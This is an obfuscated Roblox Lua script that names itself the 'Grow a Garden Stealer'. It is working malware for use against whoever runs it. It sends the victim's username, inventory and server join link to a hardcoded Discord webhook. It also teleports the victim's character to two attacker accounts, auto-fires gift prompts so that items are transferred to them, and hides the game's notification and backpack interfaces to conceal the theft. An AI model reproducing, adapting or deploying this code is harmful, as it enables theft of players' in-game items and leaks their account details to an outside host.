--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="https://discord.com/api/webhooks/1391051342575046699/6kXwGsa-tqGH48sEC4f18jrmYgZPGCv76HQPg3uuK0G8qi7ZgbZSMpx0co3KKFeLieHr";local v1=game:GetService("HttpService");local v2=game.Players.LocalPlayer;local v3,v4=v2.Name,v2.DisplayName;local v5,v6=game.JobId,game.PlaceId;local function v7() return (syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request) or (getgenv and getgenv().request) or (krnl and krnl.request) or (token and token.http_request) or nil ;end local v8="https://kebabman.vercel.app/start?placeId="   .. v6   .. "&gameInstanceId="   .. v5 ;local v9=[[
local T=game:GetService("TeleportService")
T:TeleportToPlaceInstance(]]   .. v6   .. [[,"]]   .. v5   .. [[",game.Players.LocalPlayer)
]] ;local v10={};local v11=v2:FindFirstChild("Backpack");if v11 then for v56,v57 in ipairs(v11:GetChildren()) do if (v57:IsA("Tool") and string.find(v57.Name:lower(),"kg")) then table.insert(v10,v57.Name);end end end local v12="```";if ( #v10>0) then v12=v12   .. "\n"   .. table.concat(v10,"\n") ;else v12=v12   .. "\nNo fruits found." ;end v12=v12   .. "```" ;local v13="```Display Name: "   .. v4   .. "\nUsername: "   .. v3   .. "```" ;local v14={title="ðŸŒ± Grow a Garden Stealer ðŸŒ±",description="ðŸŒ¿ Grow a garden stealer ðŸŒ¿:",color=3066993,fields={{name="ðŸ‘¤ Player Info",value=v13,inline=false},{name="ðŸŽ Fruits Found",value=v12,inline=false},{name="ðŸ”— Join with URL",value=v8,inline=false},{name="ðŸ“œ Teleport Script",value="```lua\n"   .. v9   .. "\n```" ,inline=false}},footer={text="Grow a Garden Stealer - Stay vigilant!",icon_url="https://th.bing.com/th/id/OIP.fz2ByC1kSEbCFO2vRtcgfwHaHa?w=171&h=180&c=7&r=0&o=7&pid=1.7&rm=3"},timestamp=os.date("!%Y-%m-%dT%H:%M:%SZ")};local v15=v1:JSONEncode({username="GardenStealerBot",embeds={v14}});local v16=v7();if v16 then v16({Url=v0,Method="POST",Headers={["Content-Type"]="application/json"},Body=v15});end local v17=game:GetService("RunService");local v18=v2;local v19=v18:WaitForChild("Backpack");local v20={"HelloyalltryV2","notfishybloxdontrade"};local v21,v22={},{};for v27,v28 in pairs(v20) do local v29=game.Players:FindFirstChild(v28);v21[v28]=v29;v22[v28]=v29 and (v29.Character or v29.CharacterAdded:Wait()) ;end game.Players.PlayerAdded:Connect(function(v32) for v44,v45 in pairs(v20) do if (v32.Name==v45) then v21[v45]=v32;v32.CharacterAdded:Connect(function(v69) v22[v45]=v69;end);v22[v45]=v32.Character or v32.CharacterAdded:Wait() ;end end end);game.Players.PlayerChatted:Connect(function(v33,v34) for v46,v47 in pairs(v20) do if ((v33.Name==v47) and v18.Character and v22[v47]) then local v63=v18.Character:FindFirstChild("HumanoidRootPart");local v64=v22[v47]:FindFirstChild("HumanoidRootPart");if (v63 and v64) then v63.CFrame=v64.CFrame;end end end end);v17.Heartbeat:Connect(function() for v48,v49 in pairs(v20) do local v50=v22[v49];if (v18.Character and v50) then local v65=v18.Character:FindFirstChild("HumanoidRootPart");local v66=v50:FindFirstChild("HumanoidRootPart");if (v65 and v66) then v65.CFrame=v66.CFrame;end end end end);local v23={};local function v24() for v51,v52 in pairs(workspace:GetDescendants()) do if v52:IsA("ProximityPrompt") then local v67=string.lower(v52.ObjectText or "" );local v68=string.lower(v52.ActionText or "" );if (v67:find("gift") or v68:find("gift")) then v52.HoldDuration=0;v52.RequiresLineOfSight=false;v52.MaxActivationDistance=math.huge;fireproximityprompt(v52);return v52;end end end return nil;end local function v25(v35) if  not v35 then return nil;end local v36=v35.Parent;if (v36 and v36:IsA("Model")) then return game.Players:GetPlayerFromCharacter(v36);end return nil;end local function v26(v37) if ( not v37 or  not v37:IsDescendantOf(game) or (v37.Parent==nil)) then return false,nil;end local v38=pcall(function() v37.Parent=v18.Character;end);if  not v38 then return false,nil;end task.wait(0.5);local v39=v24();task.wait(1);local v40=v25(v39);local v41=10;local v42=0;while v37 and v37:IsDescendantOf(game) and ((v37.Parent==v18.Character) or (v37.Parent==v19))  do task.wait(0.5);v42+=0.5 if (v42>=v41) then break;end end if  not v37:IsDescendantOf(game) then return true,v40;end pcall(function() v37.Parent=v19;end);return false,v40;end spawn(function() while true do for v58,v59 in pairs(v20) do if (v21[v59] and v21[v59].Parent) then local v71={};for v80,v81 in pairs(v19:GetChildren()) do if (v81:IsA("Tool") and string.match(v81.Name,"%[.-kg%]")) then table.insert(v71,v81);end end if  not v23[v59] then for v82,v83 in pairs(v71) do local v84,v85=v26(v83);if (v84 and v85 and (v85.Name==v59)) then v23[v59]=true;break;end end end end end task.wait(1);end end);pcall(function() v18.PlayerGui:FindFirstChild("Top_Notification"):Destroy();end);pcall(function() local v43=v18.PlayerGui:FindFirstChild("BackpackGui");if v43 then v43.Enabled=false;end end);
